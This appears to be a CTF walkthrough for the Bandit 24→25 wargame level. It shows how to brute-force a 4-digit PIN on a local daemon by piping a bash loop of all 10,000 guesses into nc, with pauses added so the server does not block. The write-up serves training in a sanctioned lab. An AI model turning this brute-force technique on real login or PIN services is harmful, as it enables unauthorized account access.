Skip to content

Bandit24->25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time

Commands useful to solve the level

Helpful Reading Material

Where to start?

We already know that there is a daemon listening on port 30002 which listens for our password. The goal here is to find an efficient way to brute-force the password for the next level.

Part 1 : Getting to know the daemon

This part will be pretty short as we already have experience with daemons (see bandit14 for more explanations). We will simply connect and try to communicate with the daemon to see how we should speak with it.

Hint

By using the nc utility, can you figure out the format of the string you should send the daemon in order to craft your brute-force attack?

Solution

Using nc, we can speak with the daemon and run the following tests : 

bandit24@bandit:/tmp/abcdef.PtK5$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
bandit24_password 0000
Wrong! Please enter the correct pincode. Try again.
bandit24_pasword 0001
Wrong! Please enter the correct pincode. Try again.
^C
bandit24@bandit:/tmp/abcdef.PtK5$
Using that information, we know the format of the string we're supposed to send to the daemon to try to bruteforce the password. Let's now try and use this knowledge to craft our brute-force attack.

Part 2 : Crafting the attack

Now that we know how to communicate with the server and that we noticed that indeed, we don't have to open a new connection for each message, let's try to generate all the password/pincode combinations for our brute-force attack.

Hint

Using the Brace Expansion, the Looping Constructs and the printf sections of the gnu bash manual, can you figure out a way to generate all the combinations for our attack?

Solution

You'll be able to find a lot of solutions following the same pattern all over the internet. Let's try to do something a bit different.

We are going to use a for loop, but not the one that depends on a pattern, the one that depends on an arithmetic expression.

Here is what our loop is going to be : 

for (( i=0 ; i < 10000 ; ++i )) ; do printf "%s %04d\n" "bandit24_pass" "$i" ; done

Here is a detail of what our loop does :

  1. For all the integers between 0 and 9999 it does the following :
  2. It prints the string bandit24_pass alongside the value of the integer (padded with zeros on the left to fit a field width of 4 characters)
Part 3 : Launching the attack and retrieving the password

Now that we know what our for loop looks like, you might want to know why we used this construct instead of the first form. Let's not wonder about that for now and instead launch the attack.

Hint

Using our newly constructed for loop, can you figure out a way to use nc to retrieve the password?

Solution

Here is how we are going to use our for loop to retrieve the password. 

for (( i=0 ; i < 10000 ; ++i )) ; do printf "%s %04d\n" "bandit24_pass" "$i" ; done | nc -w 10 localhost 30002
This loop will test all the 10000 strings against the server pin and will be enough to retrieve the password.

Info

The -w option of nc allows to specify a timeout in case the connection becomes idle. If the timeout is reached, the connection will be closed.

Part 4 : Let me think please

If this hasn't been patched yet, you might notice that the server blocks indefinitely after a given number of attempts. The goal of this last part is to ensure that the server won't block and that we'll be able to test all the connections.

Hint

Using our command from the last part, would you be able to add a simple check to ensure that the server doesn't test all the attempts at the same time but waits a bit before sending each chunk of tests.

Solution

Here is the updated command : 

for (( i=0 ; i < 10000 ; ++i )) ; do if (( $i%500 == 0 )) ; then sleep 1 ; fi ; printf "%s %04d\n" "bandit24_pass" "$i" ; done | nc -w 10 localhost 30002
The if check ensure that the server gets time to process the input, ensuring that it won't block after a given amount of requests.

Full Solution
  1. for (( i=0 ; i < 10000 ; ++i )) ; do if (( $i%500 == 0 )) ; then sleep 1 ; fi ; printf "%s %04d\n" "bandit24_pass" "$i" ; done | nc -w 10 localhost 30002 this command will test the password and all of the 10000 pin combinations agains the server pin and prints the password for the next level once the right pin has been entered.
Warning

Do not forget to replace bandit24_pass with the actual password for the bandit24 user.

you can now jump to the next level